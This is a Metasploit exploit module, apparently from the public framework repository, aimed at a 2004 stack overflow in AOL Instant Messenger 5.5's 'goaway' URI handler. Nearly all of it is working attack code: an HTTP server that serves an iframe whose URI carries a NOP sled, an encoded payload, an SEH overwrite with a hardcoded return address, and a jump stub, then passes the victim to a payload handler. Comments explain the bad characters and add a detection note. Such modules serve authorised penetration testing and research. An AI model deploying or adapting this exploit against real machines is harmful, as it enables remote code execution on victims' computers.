rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/aim_goaway.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server and exploits an SEH overwrite
  #
  # The page it serves embeds an aim:goaway? URI whose 'message' parameter
  # carries the overflow buffer. Msf::Exploit::Seh supplies
  # generate_seh_record; HttpServer::HTML supplies the server side
  # (the on_request_uri callback and send_response_html).
  #
  include Msf::Exploit::Seh
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module metadata: name, description, references
  # (CVE-2004-0636 / OSVDB 8398 / BID 10889), payload constraints and a
  # single automatic Windows target.
  #
  # @param info [Hash] base module info, merged via update_info before
  #   being passed to the superclass
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AOL Instant Messenger goaway Overflow',
        'Description' => %q{
          This module exploits a flaw in the handling of AOL Instant
          Messenger's 'goaway' URI handler. An attacker can execute
          arbitrary code by supplying an overly sized buffer as the
          'message' parameter. This issue is known to affect AOL Instant
          Messenger 5.5.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'skape',
          'thief <thief[at]hick.org>'
        ],
        'References' => [
          [ 'CVE', '2004-0636' ],
          [ 'OSVDB', '8398' ],
          [ 'BID', '10889'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ],
        ],
        'Payload' => {
          # on_request_uri pads the encoded payload with a NOP sled so that
          # sled + payload is exactly this many bytes.
          'Space' => 1014,
          'MaxNops' => 1014,
          # Bytes the encoder must avoid. The buffer is interpolated raw into
          # an aim: URI inside an HTML attribute (see on_request_uri), which is
          # consistent with excluding NUL, whitespace, quotes and the
          # URI-significant characters % & + / : < > ? @.
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
          'StackAdjustment' => -3500
        },
        'Targets' => [
          # Target 0: Automatic
          [
            'Windows NT/2000/XP/2003 Automatic',
            {
              'Platform' => 'win',
              # Address written into the SEH record by generate_seh_record
              # (target['Rets'][0] in on_request_uri).
              'Rets' =>
                [
                  0x1108118f, # proto.com: pop/pop/ret
                ]
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2004-08-09',
        # Not yet characterised; all three are left at their UNKNOWN_* values.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # HTTP request callback invoked by HttpServer::HTML. Builds the overflow
  # buffer, returns it to the browser inside an <iframe> whose src is an
  # aim:goaway? URI, and then hands the connection to the payload handler.
  #
  # Detection note: the served page is a single
  # <iframe src='aim:goaway?message=...'> whose message parameter is over
  # 1014 bytes of encoded data; a goaway URI with a message of that size is
  # the observable artefact on the wire and in browser/proxy logs.
  #
  # @param cli the connected client; passed through to regenerate_payload,
  #   send_response_html and handler
  # @param _request the HTTP request (unused)
  # @return [nil] when regenerate_payload yields no payload; otherwise the
  #   value returned by handler(cli)
  def on_request_uri(cli, _request)
    # Re-generate the payload; bail out if none could be produced
    return if ((p = regenerate_payload(cli)).nil?)

    # Build out the message: the sled pads the encoded payload to exactly
    # 1014 bytes ('Space' in initialize), followed by the SEH record for
    # target 0's pop/pop/ret address and a short trailing stub.
    msg =
      make_nops(1014 - p.encoded.length) + # NOP sled before the payload
      p.encoded + # store the payload
      generate_seh_record(target['Rets'][0]) + # set up the SEH frame
      "\x90\xe9\x13\xfc\xff\xff" # jmp -1000

    # Build the HTML content. msg is interpolated without any escaping,
    # which is why the BadChars list above excludes quotes, whitespace and
    # URI-significant bytes.
    content = "<html><iframe src='aim:goaway?message=#{msg}'></html>"

    print_status("Sending #{name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end